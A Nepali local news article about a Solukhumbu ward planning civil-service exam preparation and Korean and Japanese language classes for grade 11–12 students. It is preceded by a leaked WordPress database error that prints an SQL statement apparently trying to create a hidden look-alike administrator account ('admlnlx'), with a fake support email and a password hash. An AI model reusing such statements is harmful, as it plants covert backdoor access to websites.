WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bzy843k6U2sCI/pIKQuyYt5Xp3uajG0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:11:09', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिका-७ देउसाले कक्षा ११ र १२ का विद्यार्थीलाई लक्षित गरि लोकसेवा आयोगको तयारी कक्षा सन्चालन गर्ने भएको छ । वडा समितिले बैठकनै बसेर निजामति सेवामा आकर्षित गरी सफल बनाउनको लागि लोक सेवा आयोग तयारी कक्षा संगै अन्य विभिन्न भाषाको कक्षा सन्चालन गर्ने निर्णय गरेको हो ।
अहिले सम्म वडाका नागरिक निजामति सेवामा प्रवेश नभएकाले वडाले कक्षा ११/१२ मा आयोगको तयारी कक्षा सन्चालन गर्ने निर्णय गरेको वडा अध्यक्ष भोजराज कार्कीले बताउँनुभयो । गाउँका विद्यार्थीलाई निजामति तर्फ आकर्षित गर्नको लागि देउसा मा.वि.मा तयारी कक्षा सन्चालन गर्ने उहाँको भनाई छ ।
अहिलेको सरकारकै कार्यकालमा वडाका नागरिक निजामति सेवामा प्रवेश गराउने इच्छा रहेको भन्दै वडा अध्यक्ष कार्कीले गाउँपालिका संगको समन्वय तथा सहकार्यमा कार्य अघि बढाइने बताउँनुभयो । गाउँपालिका अध्यक्ष असिम राईको समेत चहाना पालिकाका नागरिक अब्बल बनाउने रहेकाले वडाले लिएको उदेश्य पुरा हुने उहाँको भनाई छ ।
यस्तै हिमाली जिल्ला सोलुखुम्बु पर्यटकीय हिसाबले देशकै प्रमुख गन्तव्यस्थल भएकाले कोरियन र जापानीज भाषाको कक्षा सन्चालन गरि दक्ष पर्यटक गाइड उत्पादन गर्ने योजना रहेको वडा अध्यक्ष कार्कीले बताउँनुभयो । अंग्रेजी भाषा कक्षा ११/१२ मा अनिवार्य भएकाले त्यसलाइ अझ व्यवस्थित बनाउँन समन्वय गरि गुणस्तरीयता कायम गरिने बताउँनुभयो ।
गाउँका विद्यार्थी भाषा पढ्नकै लागि महङ्गो खर्चका साथ बाहिर जानुपर्ने बाध्यताको अन्त्य हुने वडा कार्यालयको विश्वास छ ।